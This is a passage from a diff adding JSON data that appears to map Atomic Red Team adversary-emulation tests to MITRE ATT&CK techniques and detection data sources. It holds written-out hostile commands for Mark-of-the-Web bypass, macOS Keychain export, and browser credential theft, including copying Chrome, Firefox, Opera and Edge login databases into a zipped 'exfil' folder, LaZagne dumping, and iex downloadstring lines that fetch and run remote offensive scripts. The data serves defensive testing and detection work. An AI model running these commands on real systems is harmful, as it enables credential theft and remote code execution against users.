"target_data_element": "process" + }, + { + "data_source": "process", + 
"definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + 
"external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1553.005", + "command_list": [ + "Mount-DiskImage -ImagePath \"PathToAtomicsFolder\\T1553.005\\bin\\T1553.005.iso\"\n", + "$keep = Mount-DiskImage -ImagePath \"PathToAtomicsFolder\\T1553.005\\bin\\FeelTheBurn.iso\" -StorageType ISO -Access ReadOnly\n$driveLetter = ($keep | Get-Volume).DriveLetter\ninvoke-item \"$($driveLetter):\\hello.exe\"\n", + "Unblock-File -Path #{file_path}\n", + "Unblock-File -Path $env:tmp\\ReadMe.md\n" + ], + "commands": [ + { + "command": "Mount-DiskImage -ImagePath \"PathToAtomicsFolder\\T1553.005\\bin\\T1553.005.iso\"\n", + "source": "atomics/T1553.005/T1553.005.yaml", + "name": "Atomic Red Team Test - Subvert Trust Controls: Mark-of-the-Web Bypass" + }, + { + "command": "$keep = Mount-DiskImage -ImagePath \"PathToAtomicsFolder\\T1553.005\\bin\\FeelTheBurn.iso\" -StorageType ISO -Access ReadOnly\n$driveLetter = ($keep | Get-Volume).DriveLetter\ninvoke-item \"$($driveLetter):\\hello.exe\"\n", + "source": "atomics/T1553.005/T1553.005.yaml", + "name": "Atomic Red Team Test - Subvert Trust Controls: Mark-of-the-Web Bypass" + }, + { + "command": "Unblock-File -Path #{file_path}\n", + "source": "atomics/T1553.005/T1553.005.yaml", + "name": "Atomic Red Team Test - Subvert Trust Controls: Mark-of-the-Web Bypass" + }, + { + "command": "Unblock-File -Path $env:tmp\\ReadMe.md\n", + "source": "atomics/T1553.005/T1553.005.yaml", + "name": "Atomic Red Team Test - Subvert Trust Controls: Mark-of-the-Web Bypass" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1553.005", + "display_name": "Subvert Trust Controls: Mark-of-the-Web Bypass", + "atomic_tests": [ + { + "name": "Mount ISO image", + 
"auto_generated_guid": "002cca30-4778-4891-878a-aaffcfa502fa", + "description": "Mounts ISO image downloaded from internet to evade Mark-of-the-Web. Upon successful execution, powershell will download the .iso from the Atomic Red Team repo, and mount the image. The provided sample ISO simply has a Reports shortcut file in it. Reference: https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "path_of_iso": { + "description": "Path to ISO file", + "type": "Path", + "default": "PathToAtomicsFolder\\T1553.005\\bin\\T1553.005.iso" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "T1553.005.iso must exist on disk at specified location (#{path_of_iso})\n", + "prereq_command": "if (Test-Path #{path_of_iso}) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/T1553.005.iso -OutFile \"#{path_of_iso}\"\n" + } + ], + "executor": { + "command": "Mount-DiskImage -ImagePath \"#{path_of_iso}\"\n", + "cleanup_command": "Dismount-DiskImage -ImagePath \"#{path_of_iso}\" | Out-Null\n", + "name": "powershell" + } + }, + { + "name": "Mount an ISO image and run executable from the ISO", + "auto_generated_guid": "42f22b00-0242-4afc-a61b-0da05041f9cc", + "description": "Mounts an ISO image downloaded from internet to evade Mark-of-the-Web and run hello.exe executable from the ISO. \nUpon successful execution, powershell will download the .iso from the Atomic Red Team repo, mount the image, and run the executable from the ISO image that will open command prompt echoing \"Hello, World!\". 
\nISO provided by:https://twitter.com/mattifestation/status/1398323532988399620 Reference:https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/, ", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "path_of_iso": { + "description": "Path to ISO file", + "type": "Path", + "default": "PathToAtomicsFolder\\T1553.005\\bin\\FeelTheBurn.iso" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "FeelTheBurn.iso must exist on disk at specified location (#{path_of_iso})\n", + "prereq_command": "if (Test-Path #{path_of_iso}) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/FeelTheBurn.iso -OutFile \"#{path_of_iso}\"\n" + } + ], + "executor": { + "command": "$keep = Mount-DiskImage -ImagePath \"#{path_of_iso}\" -StorageType ISO -Access ReadOnly\n$driveLetter = ($keep | Get-Volume).DriveLetter\ninvoke-item \"$($driveLetter):\\hello.exe\"\n", + "cleanup_command": "Dismount-DiskImage -ImagePath \"#{path_of_iso}\" | Out-Null\nStop-process -name \"hello\" -Force -ErrorAction ignore\n", + "name": "powershell" + } + }, + { + "name": "Remove the Zone.Identifier alternate data stream", + "auto_generated_guid": "64b12afc-18b8-4d3f-9eab-7f6cae7c73f9", + "description": "Remove the Zone.Identifier alternate data stream which identifies the file as downloaded from the internet.\nRemoving this allows more freedom in executing scripts in PowerShell and avoids opening files in protected view.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "file_to_download": { + "description": "File that will be downloaded to test against.", + "type": "Url", + "default": "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/README.md" + }, + "file_path": { + 
"description": "File to have the Zone.Identifier removed.", + "type": "String", + "default": "$env:tmp\\ReadMe.md" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "A test file with the Zone.Identifier attribute must be present.", + "prereq_command": "if (Test-Path #{file_path}) { EXIT 0 } else { EXIT 1 }\n", + "get_prereq_command": "Invoke-WebRequest #{file_to_download} -OutFile #{file_path}\nSet-Content -Path #{file_path} -Stream Zone.Identifier -Value '[ZoneTransfer]','ZoneId=3'\n" + } + ], + "executor": { + "command": "Unblock-File -Path #{file_path}\n", + "cleanup_command": "Set-Content -Path #{file_path} -Stream Zone.Identifier -Value '[ZoneTransfer]','ZoneId=3'\n", + "name": "powershell" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file stream" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1555.001", + "command_list": [ + "security -h\nsecurity find-certificate -a -p > /tmp/certs.pem\nsecurity import /tmp/certs.pem -k\n" + ], + "commands": [ + { + "command": "security -h\nsecurity find-certificate -a -p > /tmp/certs.pem\nsecurity import /tmp/certs.pem -k\n", + "source": "atomics/T1555.001/T1555.001.yaml", + "name": "Atomic Red Team Test - Credentials from Password Stores: Keychain" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1555.001", + "display_name": "Credentials from Password Stores: Keychain", + "atomic_tests": [ + { + "name": "Keychain", + "auto_generated_guid": "1864fdec-ff86-4452-8c30-f12507582a93", + "description": "### Keychain Files\n\n ~/Library/Keychains/\n\n /Library/Keychains/\n\n /Network/Library/Keychains/\n\n [Security Reference](https://developer.apple.com/legacy/library/documentation/Darwin/Reference/ManPages/man1/security.1.html)\n\n [Keychain dumper](https://github.com/juuso/keychaindump)\n", + "supported_platforms": [ + "macos" + ], + "input_arguments": { + "cert_export": { + "description": "Specify the path of the certificates to export.", + "type": "Path", + "default": "/tmp/certs.pem" + } + }, + 
"executor": { + "command": "security -h\nsecurity find-certificate -a -p > #{cert_export}\nsecurity import #{cert_export} -k\n", + "name": "sh" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + 
], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1555.003", + "command_list": [ + "Set-Location -path \"$env:TEMP\\Sysinternals\";\n./accesschk.exe -accepteula .;\n", + "cd ~/Library/Cookies\ngrep -q \"coinbase\" \"Cookies.binarycookies\"\n", + "PathToAtomicsFolder\\T1555.003\\bin\\LaZagne.exe browsers\n", + "Copy-Item \"$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\Login Data\" -Destination 
$env:temp\nCopy-Item \"$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\Login Data For Account\" -Destination $env:temp\n", + "Copy-Item \"$env:APPDATA\\Opera Software\\Opera Stable\\Login Data\" -Destination $env:temp\n", + "Copy-Item \"$env:APPDATA\\Mozilla\\Firefox\\Profiles\\\" -Destination $env:temp -Force -Recurse\n", + "Copy-Item \"$env:LOCALAPPDATA\\Microsoft\\Edge\\User Data\\Default\" -Destination $env:temp\\Edge -Force -Recurse\n", + "$PasswordDBLocation = get-childitem -path \"$env:appdata\\Mozilla\\Firefox\\Profiles\\*.default-release\\\"\ncmd /c $env:temp\\Firepwd.py -d $PasswordDBLocation > #{Out_Filepath}\ncat #{Out_Filepath}\n", + "$PasswordDBLocation = get-childitem -path \"$env:appdata\\Mozilla\\Firefox\\Profiles\\*.default-release\\\"\ncmd /c #{Firepwd_Path} -d $PasswordDBLocation > $env:temp\\T1555.003Test8.txt\ncat $env:temp\\T1555.003Test8.txt\n", + "$PasswordDBLocation = get-childitem -path \"$env:appdata\\Mozilla\\Firefox\\Profiles\\*.default-release\\\"\ncmd /c #{Firepwd_Path} -d $PasswordDBLocation > #{Out_Filepath}\ncat #{Out_Filepath}\n", + "python3 /tmp/LaZagne/Linux/laZagne.py #{specific_module} >> #{output_file}", + "python3 #{lazagne_path}/laZagne.py browsers -firefox >> #{output_file}", + "python3 #{lazagne_path}/laZagne.py #{specific_module} >> /tmp/firefox_password.txt", + "$exfil_folder = \"$env:temp\\T1555.003\"\nif (test-path \"$exfil_folder\") {} else {new-item -path \"$env:temp\" -Name \"T1555.003\" -ItemType \"directory\" -force}\n$FirefoxCredsLocation = get-childitem -path \"$env:appdata\\Mozilla\\Firefox\\Profiles\\*.default-release\\\"\nif (test-path \"$FirefoxCredsLocation\\key4.db\") {copy-item \"$FirefoxCredsLocation\\key4.db\" -destination \"$exfil_folder\\T1555.003Firefox_key4.db\"} else {}\nif (test-path \"$FirefoxCredsLocation\\logins.json\") {copy-item \"$FirefoxCredsLocation\\logins.json\" -destination \"$exfil_folder\\T1555.003Firefox_logins.json\"} else {}\nif (test-path 
\"$env:localappdata\\Google\\Chrome\\User Data\\Default\\Login Data\") {copy-item \"$env:localappdata\\Google\\Chrome\\User Data\\Default\\Login Data\" -destination \"$exfil_folder\\T1555.003Chrome_Login Data\"} else {}\nif (test-path \"$env:localappdata\\Google\\Chrome\\User Data\\Default\\Login Data For Account\") {copy-item \"$env:localappdata\\Google\\Chrome\\User Data\\Default\\Login Data For Account\" -destination \"$exfil_folder\\T1555.003Chrome_Login Data For Account\"} else {}\nif (test-path \"$env:appdata\\Opera Software\\Opera Stable\\Login Data\") {copy-item \"$env:appdata\\Opera Software\\Opera Stable\\Login Data\" -destination \"$exfil_folder\\T1555.003Opera_Login Data\"} else {}\nif (test-path \"$env:localappdata/Microsoft/Edge/User Data/Default/Login Data\") {copy-item \"$env:localappdata/Microsoft/Edge/User Data/Default/Login Data\" -destination \"$exfil_folder\\T1555.003Edge_Login Data\"} else {} \ncompress-archive -path \"$exfil_folder\" -destinationpath \"$exfil_folder.zip\" -force\n", + "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nbrowserpwn -consoleoutput -noninteractive", + "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nkittenz -consoleoutput -noninteractive", + "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Sharpweb.ps1')\nInvoke-Sharpweb -command \"all\"", + "cp ~/Library/\"Application Support/Google/Chrome/Default/Login Data\" \"/tmp/T1555.003_Login Data\"\ncp ~/Library/\"Application Support/Google/Chrome/Default/Login Data For Account\" \"/tmp/T1555.003_Login Data For Account\"\n" 
+ ], + "commands": [ + { + "command": "Set-Location -path \"$env:TEMP\\Sysinternals\";\n./accesschk.exe -accepteula .;\n", + "source": "atomics/T1555.003/T1555.003.yaml", + "name": "Atomic Red Team Test - Credentials from Password Stores: Credentials from Web Browsers" + }, + { + "command": "cd ~/Library/Cookies\ngrep -q \"coinbase\" \"Cookies.binarycookies\"\n", + "source": "atomics/T1555.003/T1555.003.yaml", + "name": "Atomic Red Team Test - Credentials from Password Stores: Credentials from Web Browsers" + }, + { + "command": "PathToAtomicsFolder\\T1555.003\\bin\\LaZagne.exe browsers\n", + "source": "atomics/T1555.003/T1555.003.yaml", + "name": "Atomic Red Team Test - Credentials from Password Stores: Credentials from Web Browsers" + }, + { + "command": "Copy-Item \"$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\Login Data\" -Destination $env:temp\nCopy-Item \"$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\Login Data For Account\" -Destination $env:temp\n", + "source": "atomics/T1555.003/T1555.003.yaml", + "name": "Atomic Red Team Test - Credentials from Password Stores: Credentials from Web Browsers" + }, + { + "command": "Copy-Item \"$env:APPDATA\\Opera Software\\Opera Stable\\Login Data\" -Destination $env:temp\n", + "source": "atomics/T1555.003/T1555.003.yaml", + "name": "Atomic Red Team Test - Credentials from Password Stores: Credentials from Web Browsers" + }, + { + "command": "Copy-Item \"$env:APPDATA\\Mozilla\\Firefox\\Profiles\\\" -Destination $env:temp -Force -Recurse\n", + "source": "atomics/T1555.003/T1555.003.yaml", + "name": "Atomic Red Team Test - Credentials from Password Stores: Credentials from Web Browsers" + }, + { + "command": "Copy-Item \"$env:LOCALAPPDATA\\Microsoft\\Edge\\User Data\\Default\" -Destination $env:temp\\Edge -Force -Recurse\n", + "source": "atomics/T1555.003/T1555.003.yaml", + "name": "Atomic Red Team Test - Credentials from Password Stores: Credentials from Web Browsers" + }, + { + "command": 
"$PasswordDBLocation = get-childitem -path \"$env:appdata\\Mozilla\\Firefox\\Profiles\\*.default-release\\\"\ncmd /c $env:temp\\Firepwd.py -d $PasswordDBLocation > #{Out_Filepath}\ncat #{Out_Filepath}\n", + "source": "atomics/T1555.003/T1555.003.yaml", + "name": "Atomic Red Team Test - Credentials from Password Stores: Credentials from Web Browsers" + }, + { + "command": "$PasswordDBLocation = get-childitem -path \"$env:appdata\\Mozilla\\Firefox\\Profiles\\*.default-release\\\"\ncmd /c #{Firepwd_Path} -d $PasswordDBLocation > $env:temp\\T1555.003Test8.txt\ncat $env:temp\\T1555.003Test8.txt\n", + "source": "atomics/T1555.003/T1555.003.yaml", + "name": "Atomic Red Team Test - Credentials from Password Stores: Credentials from Web Browsers" + }, + { + "command": "$PasswordDBLocation = get-childitem -path \"$env:appdata\\Mozilla\\Firefox\\Profiles\\*.default-release\\\"\ncmd /c #{Firepwd_Path} -d $PasswordDBLocation > #{Out_Filepath}\ncat #{Out_Filepath}\n", + "source": "atomics/T1555.003/T1555.003.yaml", + "name": "Atomic Red Team Test - Credentials from Password Stores: Credentials from Web Browsers" + }, + { + "command": "python3 /tmp/LaZagne/Linux/laZagne.py #{specific_module} >> #{output_file}", + "source": "atomics/T1555.003/T1555.003.yaml", + "name": "Atomic Red Team Test - Credentials from Password Stores: Credentials from Web Browsers" + }, + { + "command": "python3 #{lazagne_path}/laZagne.py browsers -firefox >> #{output_file}", + "source": "atomics/T1555.003/T1555.003.yaml", + "name": "Atomic Red Team Test - Credentials from Password Stores: Credentials from Web Browsers" + }, + { + "command": "python3 #{lazagne_path}/laZagne.py #{specific_module} >> /tmp/firefox_password.txt", + "source": "atomics/T1555.003/T1555.003.yaml", + "name": "Atomic Red Team Test - Credentials from Password Stores: Credentials from Web Browsers" + }, + { + "command": "$exfil_folder = \"$env:temp\\T1555.003\"\nif (test-path \"$exfil_folder\") {} else {new-item -path \"$env:temp\" 
-Name \"T1555.003\" -ItemType \"directory\" -force}\n$FirefoxCredsLocation = get-childitem -path \"$env:appdata\\Mozilla\\Firefox\\Profiles\\*.default-release\\\"\nif (test-path \"$FirefoxCredsLocation\\key4.db\") {copy-item \"$FirefoxCredsLocation\\key4.db\" -destination \"$exfil_folder\\T1555.003Firefox_key4.db\"} else {}\nif (test-path \"$FirefoxCredsLocation\\logins.json\") {copy-item \"$FirefoxCredsLocation\\logins.json\" -destination \"$exfil_folder\\T1555.003Firefox_logins.json\"} else {}\nif (test-path \"$env:localappdata\\Google\\Chrome\\User Data\\Default\\Login Data\") {copy-item \"$env:localappdata\\Google\\Chrome\\User Data\\Default\\Login Data\" -destination \"$exfil_folder\\T1555.003Chrome_Login Data\"} else {}\nif (test-path \"$env:localappdata\\Google\\Chrome\\User Data\\Default\\Login Data For Account\") {copy-item \"$env:localappdata\\Google\\Chrome\\User Data\\Default\\Login Data For Account\" -destination \"$exfil_folder\\T1555.003Chrome_Login Data For Account\"} else {}\nif (test-path \"$env:appdata\\Opera Software\\Opera Stable\\Login Data\") {copy-item \"$env:appdata\\Opera Software\\Opera Stable\\Login Data\" -destination \"$exfil_folder\\T1555.003Opera_Login Data\"} else {}\nif (test-path \"$env:localappdata/Microsoft/Edge/User Data/Default/Login Data\") {copy-item \"$env:localappdata/Microsoft/Edge/User Data/Default/Login Data\" -destination \"$exfil_folder\\T1555.003Edge_Login Data\"} else {} \ncompress-archive -path \"$exfil_folder\" -destinationpath \"$exfil_folder.zip\" -force\n", + "source": "atomics/T1555.003/T1555.003.yaml", + "name": "Atomic Red Team Test - Credentials from Password Stores: Credentials from Web Browsers" + }, + { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nbrowserpwn -consoleoutput -noninteractive", + "source": 
"atomics/T1555.003/T1555.003.yaml", + "name": "Atomic Red Team Test - Credentials from Password Stores: Credentials from Web Browsers" + }, + { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nkittenz -consoleoutput -noninteractive", + "source": "atomics/T1555.003/T1555.003.yaml", + "name": "Atomic Red Team Test - Credentials from Password Stores: Credentials from Web Browsers" + }, + { + "command": "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Sharpweb.ps1')\nInvoke-Sharpweb -command \"all\"", + "source": "atomics/T1555.003/T1555.003.yaml", + "name": "Atomic Red Team Test - Credentials from Password Stores: Credentials from Web Browsers" + }, + { + "command": "cp ~/Library/\"Application Support/Google/Chrome/Default/Login Data\" \"/tmp/T1555.003_Login Data\"\ncp ~/Library/\"Application Support/Google/Chrome/Default/Login Data For Account\" \"/tmp/T1555.003_Login Data For Account\"\n", + "source": "atomics/T1555.003/T1555.003.yaml", + "name": "Atomic Red Team Test - Credentials from Password Stores: Credentials from Web Browsers" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1555.003", + "display_name": "Credentials from Password Stores: Credentials from Web Browsers", + "atomic_tests": [ + { + "name": "Run Chrome-password Collector", + "auto_generated_guid": "8c05b133-d438-47ca-a630-19cc464c4622", + "description": "A modified sysinternals suite will be downloaded and staged. The Chrome-password collector, renamed accesschk.exe, will then be executed from #{file_path}.\n\nSuccessful execution will produce stdout message stating \"Copying db ... passwordsDB DB Opened. statement prepare DB connection closed properly\". 
Upon completion, final output will be a file modification of $env:TEMP\\sysinternals\\passwordsdb.\n\nAdapted from [MITRE ATTACK Evals](https://github.com/mitre-attack/attack-arsenal/blob/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/credential-access/e7cab9bb-3e3a-4d93-99cc-3593c1dc8c6d.yml)\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "file_path": { + "description": "File path for modified Sysinternals", + "type": "String", + "default": "$env:TEMP" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Modified Sysinternals must be located at #{file_path}\n", + "prereq_command": "if (Test-Path #{file_path}\\SysInternals) {exit 0} else {exit 1}\n", + "get_prereq_command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nInvoke-WebRequest \"https://github.com/mitre-attack/attack-arsenal/raw/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/Modified-SysInternalsSuite.zip\" -OutFile \"#{file_path}\\Modified-SysInternalsSuite.zip\"\nExpand-Archive #{file_path}\\Modified-SysInternalsSuite.zip #{file_path}\\sysinternals -Force\nRemove-Item #{file_path}\\Modified-SysInternalsSuite.zip -Force\n" + } + ], + "executor": { + "command": "Set-Location -path \"#{file_path}\\Sysinternals\";\n./accesschk.exe -accepteula .;\n", + "cleanup_command": "Remove-Item #{file_path}\\Sysinternals -Force -Recurse -ErrorAction Ignore\n", + "name": "powershell" + } + }, + { + "name": "Search macOS Safari Cookies", + "auto_generated_guid": "c1402f7b-67ca-43a8-b5f3-3143abedc01b", + "description": "This test uses `grep` to search a macOS Safari binaryCookies file for specified values. 
This was used by CookieMiner malware.\n\nUpon successful execution, MacOS shell will cd to `~/Libraries/Cookies` and grep for `Cookies.binarycookies`.\n", + "supported_platforms": [ + "macos" + ], + "input_arguments": { + "search_string": { + "description": "String to search Safari cookies to find.", + "type": "String", + "default": "coinbase" + } + }, + "executor": { + "command": "cd ~/Library/Cookies\ngrep -q \"#{search_string}\" \"Cookies.binarycookies\"\n", + "name": "sh" + } + }, + { + "name": "LaZagne - Credentials from Browser", + "auto_generated_guid": "9a2915b3-3954-4cce-8c76-00fbf4dbd014", + "description": "The following Atomic test utilizes [LaZagne](https://github.com/AlessandroZ/LaZagne) to extract passwords from browsers on the Windows operating system.\nLaZagne is an open source application used to retrieve passwords stored on a local computer. \n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "lazagne_path": { + "description": "Path to LaZagne", + "type": "Path", + "default": "PathToAtomicsFolder\\T1555.003\\bin\\LaZagne.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "LaZagne.exe must exist on disk at specified location (#{lazagne_path})\n", + "prereq_command": "if (Test-Path #{lazagne_path}) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path #{lazagne_path}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/AlessandroZ/LaZagne/releases/download/2.4.3/lazagne.exe\" -OutFile \"#{lazagne_path}\"\n" + } + ], + "executor": { + "name": "command_prompt", + "elevation_required": true, + "command": 